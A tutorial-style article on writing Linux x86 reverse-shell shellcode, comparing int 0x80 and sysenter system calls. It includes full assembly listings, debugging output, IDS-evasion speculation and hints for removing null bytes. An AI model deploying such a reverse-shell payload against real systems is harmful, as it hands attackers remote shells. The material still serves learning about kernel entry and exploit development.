- Introduction
System calls are issued by user mode programs to request the kernel to perform some operation. Indeed, some resources, such as hardware resources, are not directly available in user mode. When a user mode program needs to open a file on the hard disk drive, it issues a system call; the kernel handles the opening of the file and gives back a file descriptor to the user mode program.
On Unix systems, the C library provides wrappers around these system calls. In the previous example, the open function performs a system call.
In shellcode development, using the libc is not always the easiest way, especially when Address Space Layout Randomization (ASLR) is on. Hence, a shellcoder should be able to directly ask the kernel for resources through syscalls.
Current Linux kernels provide two ways to issue a system call on Intel platforms: the int 0x80 opcode and the sysenter opcode.
The goal here is not to cover the famous int 0x80 opcode in detail. Let's just recall that int 0x80 is implemented as a Trap Gate.
In Linux terminology, Trap Gates and Interrupt Gates are entries of the Interrupt Descriptor Table (IDT) that contain a Segment Selector and an offset inside this segment that points to an interrupt or exception handler. The difference between Interrupt Gates and Trap Gates is that interrupts are not masked during the execution of a Trap Gate handler.
int 0x80 is particular among trap gates: it is one of the three implemented system gates. A system gate is a trap gate accessible by user mode programs.
When an int 0x80 is issued by a user mode program, the CPU looks up the handler pointed to by entry 128 (0x80) of the IDT. This handler is the system_call() function, which does all the work necessary to move from user mode to kernel mode (register saving, security checks, etc.).
Most shellcodes use this method to access resources that are not accessible from the user mode the target program is running in.
As a consequence, we can assume that the int 0x80 opcode is checked by Intrusion Detection Systems (IDS). I wonder whether an attacker can take advantage of sysenter to escape some IDS technology. Indeed, if an IDS checks for the int 0x80 opcode, we could defeat it by using the sysenter opcode instead, as the two instructions are encoded completely differently:
$ ./nasm_shell.rb
nasm > int 0x80
00000000  CD80              int 0x80
nasm > sysenter
00000000  0F34              sysenter
Of course, this is just a guess; I did not dig into it. In this article, we'll implement a shellcode using int 0x80 and then modify it to use sysenter, for fun.
- Int80 based shellcode
Let's write a reverse shell that connects back to port 0x9999 (39321) on the loopback device (127.0.0.1). This code does contain some null bytes - their removal is left to the reader as homework.
BITS 32
segment .text
global _start
_start:
push byte 0x66 ; sys_socketcall
pop eax
push byte 0x01
pop ebx ; socket()
cdq ; msb of eax is 0, so edx = 0
mov dl, 0x06 ; TCP ; can be 0
push edx
mov dl, 0x01 ; SOCK_STREAM
push edx
inc edx
push edx ; AF_INET
mov ecx, esp ; ptr to args
int 0x80 ; socket(AF_INET, SOCK_STREAM, TCP)
mov edi, eax ; sockfd = edi
push byte 0x66 ; sys_socketcall
pop eax
push byte 0x03 ; connect
pop ebx
cdq
mov ecx, edx
push edx ; end of structure
push edx ; char sin_zero = 0
push 0x0100007f ; sin.sin_addr.s_addr = 127.0.0.1
push word 0x9999 ; u_short sin_port = 39321
mov dl, 0x02
push dx ; short sin_family = 0x02
mov edx, esp ; my_addr on stack
mov cl, 0x10
push ecx ; addrlen = 16
push edx ; &my_addr
push edi ; sockfd
mov ecx, esp ; ptr to args
int 0x80 ; connect(sockfd, &my_addr, addrlen);
mov ebx, edi ; sockfd = ebx
push byte 0x3f ; sys_dup2
pop eax
xor ecx, ecx
int 0x80 ; dup2(sockfd, stdin) // stdin = 0
push byte 0x3f ; sys_dup2
pop eax
inc ecx
int 0x80 ; dup2(sockfd, stdout) // stdout = 1
push byte 0x3f ; sys_dup2
pop eax
inc ecx
int 0x80 ; dup2(sockfd, stderr) // stderr = 2
cdq
push edx
push 0x68732f6e ; echo -n //bin/sh | od -t x4
push 0x69622f2f ; //bin/sh\0 on stack
mov ebx, esp ; save stack position
push edx ; NULL
push ebx ; pointer to string
; ebx points to string //bin/sh
mov ecx, esp ; pointer to array {ebx, NULL}
push byte 0xc
pop eax
dec eax
int 0x80 ; execve(ebx, ecx, edx)
push byte 0x1 ; sys_exit
pop ebx
xchg eax, ebx
dec ebx
int 0x80 ; exit(); only reached if execve fails
Netcat is used to listen for connections on port 0x9999:
$ nc -lp 39321
Meanwhile, in another shell, our reverse shell is assembled, linked and launched:
$ nasm -f elf reverseshell_int80.asm && ld -o reverseshell_int80 reverseshell_int80.o && ./reverseshell_int80
On our first shell, we get a "remote" shell:
$ nc -lp 39321
ls
reverseshell_int80
reverseshell_int80.asm
reverseshell_int80.o
echo w00t
w00t
exit
$
Good! Now let's modify this code to make use of sysenter.
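The immediate values pushed in the int 0x80 listing are easy to get wrong when the target address or the command string changes. The following is a minimal Python sketch to cross-check them; the helper names stack_dwords and sockaddr_in are made up for this illustration, and it only assumes the i386 little-endian layout used in the listing.

```python
import socket
import struct


def stack_dwords(data):
    """Return the 32-bit immediates to push so that `data` ends up in memory.

    The stack grows downwards, so the last 4-byte chunk is pushed first.
    """
    assert len(data) % 4 == 0, "pad the string to a multiple of 4 bytes"
    words = struct.unpack("<%dI" % (len(data) // 4), data)
    return list(reversed(words))


def sockaddr_in(ip, port):
    """Build the 16-byte struct sockaddr_in laid out on the stack before connect()."""
    return (
        struct.pack("<H", socket.AF_INET)  # sin_family, little-endian host order
        + struct.pack(">H", port)          # sin_port, network (big-endian) order
        + socket.inet_aton(ip)             # sin_addr, network order
        + b"\x00" * 8                      # sin_zero padding
    )


if __name__ == "__main__":
    # Immediates for the "//bin/sh" string, in push order.
    print([hex(w) for w in stack_dwords(b"//bin/sh")])
    # Bytes expected at esp once the structure has been pushed.
    print(sockaddr_in("127.0.0.1", 0x9999).hex())
```

Port 0x9999 reads the same in both byte orders, which is why the listing can push it without swapping. With another port, for instance 4444 (0x115c), the word to push would be 0x5c11.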
- Sysenter based shellcode - "naive" approach
A naive approach would be to replace every int 0x80 opcode with a sysenter opcode:
$ sed 's/int 0x80/sysenter/g' reverseshell_int80.asm > reverseshell_sysenter.asm
$ nasm -f elf reverseshell_sysenter.asm && ld -o reverseshell_sysenter reverseshell_sysenter.o
$ ./reverseshell_sysenter
Segmentation fault
As we can see, it does not go well...
- int vs. sysenter
eip handling
Indeed, sysenter does not perform all the register saving that int 0x80 does.
When int 0x80 is issued, the CPU saves the eflags, eip, esp, ss and cs registers. Then it switches from user mode to kernel mode. Before eventually calling the syscall routine, the kernel saves the remaining registers on the stack.
On the other hand, when the sysenter opcode is issued, the CPU copies the content of three Model-Specific Registers (MSR):
SYSENTER_CS_MSR, containing the segment selector of the kernel code segment;
SYSENTER_EIP_MSR, containing a pointer to the sysenter_entry() function;
SYSENTER_ESP_MSR, containing the kernel stack pointer.
The content of SYSENTER_CS_MSR is copied into the cs register, SYSENTER_ESP_MSR into esp and SYSENTER_EIP_MSR into eip.
The last point is important: the address eip was pointing to is not saved. If a call opcode had been used, the address of the next instruction would have been saved on the stack. Here it is definitely not the case. Hence, the shellcoder has to save eip manually.
The return from sysenter is handled by the sysexit opcode, which switches from kernel mode back to user mode, and by the code at the SYSENTER_RETURN label, which pops the ebp, edx and ecx registers and ends with a ret opcode. The ret opcode pops eip from the stack. As a consequence, the shellcoder just needs to manually push eip on the stack before issuing the sysenter opcode.
Other registers handling
Moreover, running reverseshell_sysenter under gdb gives extra information:
$ gdb ./reverseshell_sysenter
gdb$ r
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
  EAX: FFFFFFF2  EBX: 00000001  ECX: BFFFF504  EDX: 00000002  o d I t s z a p c
  ESI: 00000000  EDI: 00000000  EBP: 00000000  ESP: 00000000  EIP: B7FFF424
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0000  SS: 007B
[007B:00000000]----------------------------------------------------------[stack]
00000050 : Error while running hook_stop:
Cannot access memory at address 0x50
0xb7fff424 in __kernel_vsyscall ()
gdb$
The crash happens at 0xb7fff424, inside __kernel_vsyscall, with esp set to 0. The __kernel_vsyscall code shows that the ecx, edx and ebp registers are saved on the stack before sysenter, because these registers are used internally, and that 0xb7fff424 is the pop ebp that restores them:
gdb$ disass __kernel_vsyscall
Dump of assembler code for function __kernel_vsyscall:
0xb7fff414 <__kernel_vsyscall+0>:  push ecx
0xb7fff415 <__kernel_vsyscall+1>:  push edx
0xb7fff416 <__kernel_vsyscall+2>:  push ebp
0xb7fff417 <__kernel_vsyscall+3>:  mov ebp,esp
0xb7fff419 <__kernel_vsyscall+5>:  sysenter
0xb7fff41b <__kernel_vsyscall+7>:  nop
0xb7fff41c <__kernel_vsyscall+8>:  nop
0xb7fff41d <__kernel_vsyscall+9>:  nop
0xb7fff41e <__kernel_vsyscall+10>: nop
0xb7fff41f <__kernel_vsyscall+11>: nop
0xb7fff420 <__kernel_vsyscall+12>: nop
0xb7fff421 <__kernel_vsyscall+13>: nop
0xb7fff422 <__kernel_vsyscall+14>: int 0x80
0xb7fff424 <__kernel_vsyscall+16>: pop ebp
0xb7fff425 <__kernel_vsyscall+17>: pop edx
0xb7fff426 <__kernel_vsyscall+18>: pop ecx
0xb7fff427 <__kernel_vsyscall+19>: ret
End of assembler dump.
gdb$
The shellcoder has to implement this stack saving manually.
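To see why both the return address and the three saved registers matter, here is a toy Python model of the user stack around one sysenter round trip. It is only a sketch: the Stack class, the Fault exception, the sysenter_round_trip function and the addresses are invented for the illustration, and it assumes (as the register dump above suggests) that user mode resumes at the pop ebp of __kernel_vsyscall with esp equal to the value ebp held when sysenter was executed.

```python
class Fault(Exception):
    """Raised when the model reads an address that was never written."""


class Stack:
    """Toy 32-bit user stack: a dict of address -> dword, growing downwards."""

    def __init__(self, esp=0xBFFFF500):
        self.mem = {}
        self.esp = esp

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self):
        if self.esp not in self.mem:
            raise Fault("cannot access memory at 0x%x" % self.esp)
        value = self.mem[self.esp]
        self.esp += 4
        return value


def sysenter_round_trip(stack, regs, save_context, return_address=0x08048080):
    """Model one sysenter and the return through the vsyscall epilogue.

    return_address is a hypothetical address for the instruction that
    follows the call. Returns the eip loaded by the final ret.
    """
    if save_context:
        stack.push(return_address)  # pushed by the call opcode
        stack.push(regs["ecx"])     # push ecx
        stack.push(regs["edx"])     # push edx
        stack.push(regs["ebp"])     # push ebp
        regs["ebp"] = stack.esp     # mov ebp, esp
    # sysenter ... sysexit: modelled assumption, esp comes back equal to ebp
    stack.esp = regs["ebp"]
    # vsyscall epilogue: pop ebp / pop edx / pop ecx / ret
    regs["ebp"] = stack.pop()
    regs["edx"] = stack.pop()
    regs["ecx"] = stack.pop()
    return stack.pop()


if __name__ == "__main__":
    regs = {"ecx": 0xBFFFF504, "edx": 2, "ebp": 0}
    print(hex(sysenter_round_trip(Stack(), dict(regs), save_context=True)))
    try:
        sysenter_round_trip(Stack(), dict(regs), save_context=False)
    except Fault as exc:
        print("naive sysenter:", exc)
```

In the model, the version that saves its context returns to the pushed address with all three registers restored, while the naive version faults on the first pop because ebp, and therefore esp, is 0.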
- Sysenter shellcode
Register saving has to be handled manually in our shellcode, by the _sysenter function:
_sysenter:
push ecx
push edx
push ebp
mov ebp,esp
sysenter
Moreover, in order to save the address of the next instruction on the stack, each syscall goes through a call to the _sysenter function. Indeed, when a call opcode is issued, the eip register is saved on the stack.
The final code looks like this:
BITS 32
segment .text
global _start
_start:
push byte 0x66 ; sys_socketcall
pop eax
push byte 0x01
pop ebx ; socket()
cdq ; msb of eax is 0, so edx = 0
mov dl, 0x06 ; TCP ; can be 0
push edx
mov dl, 0x01 ; SOCK_STREAM
push edx
inc edx
push edx ; AF_INET
mov ecx, esp ; ptr to args
call _sysenter ; socket(AF_INET, SOCK_STREAM, TCP)
mov edi, eax ; sockfd = edi
push byte 0x66 ; sys_socketcall
pop eax
push byte 0x03 ; connect
pop ebx
cdq
mov ecx, edx
push edx ; end of structure
push edx ; char sin_zero = 0
push 0x0100007f ; sin.sin_addr.s_addr = 127.0.0.1
push word 0x9999 ; u_short sin_port = 39321
mov dl, 0x02
push dx ; short sin_family = 0x02
mov edx, esp ; my_addr on stack
mov cl, 0x10
push ecx ; addrlen = 16
push edx ; &my_addr
push edi ; sockfd
mov ecx, esp ; ptr to args
call _sysenter ; connect(sockfd, &my_addr, addrlen);
mov ebx, edi ; sockfd = ebx
push byte 0x3f ; sys_dup2
pop eax
xor ecx, ecx
call _sysenter ; dup2(sockfd, stdin) // stdin = 0
push byte 0x3f ; sys_dup2
pop eax
inc ecx
call _sysenter ; dup2(sockfd, stdout) // stdout = 1
push byte 0x3f ; sys_dup2
pop eax
inc ecx
call _sysenter ; dup2(sockfd, stderr) // stderr = 2
cdq
push edx
push 0x68732f6e ; echo -n //bin/sh | od -t x4
push 0x69622f2f ; //bin/sh\0 on stack
mov ebx, esp ; save stack position
push edx ; NULL
push ebx ; pointer to string
; ebx points to string //bin/sh
mov ecx, esp ; pointer to array {ebx, NULL}
push byte 0xc
pop eax
dec eax
call _sysenter ; execve(ebx, ecx, edx)
push byte 0x1 ; sys_exit
pop ebx
xchg eax, ebx
dec ebx
call _sysenter ; exit(); only reached if execve fails
_sysenter:
push ecx
push edx
push ebp
mov ebp,esp
sysenter
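Before reusing a listing like this one as a payload, it is worth looking at how the call instructions are encoded. The Python sketch below computes the bytes of a near relative call (opcode E8 followed by a 32-bit little-endian displacement) and lists any bad characters; the helper names encode_call and bad_chars and the offsets used are hypothetical, chosen only for the illustration.

```python
import struct


def encode_call(call_addr, target_addr):
    """Encode 'call rel32' (opcode E8) for a call located at call_addr.

    The displacement is relative to the instruction that follows the
    5-byte call.
    """
    rel32 = target_addr - (call_addr + 5)
    return b"\xe8" + struct.pack("<i", rel32)


def bad_chars(code, bad=b"\x00"):
    """Return the sorted list of bad byte values that appear in code."""
    return sorted(set(code) & set(bad))


if __name__ == "__main__":
    forward = encode_call(0x00, 0x60)   # callee placed after the caller
    backward = encode_call(0x60, 0x00)  # callee placed before the caller
    print(forward.hex(), bad_chars(forward))
    print(backward.hex(), bad_chars(backward))
```

A short forward call has a small positive displacement, so its upper bytes are null. A backward call has a negative displacement whose upper bytes are 0xff. Moving the callee before its callers is therefore one possible direction for removing these null bytes, though not necessarily the only one.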
Please note that it is not exploitable "as is": the forward call opcodes introduce bad chars (null bytes in the displacement), as do some of the pushed constants. This "cleaning" is left as homework for the reader.
- Conclusion
I'm not sure the sysenter opcode really has an advantage over int 0x80. As we have seen, the shellcode grows because the context has to be saved onto the user mode stack (general purpose registers ecx, edx and ebp, and the instruction pointer eip). I'm not even sure it is more stealthy. Please leave a comment or send an email if you have data on this subject.
Have phun !
Further reading: "Understanding the Linux Kernel, 3rd edition", Daniel P. Bovet & Marco Cesati, O'Reilly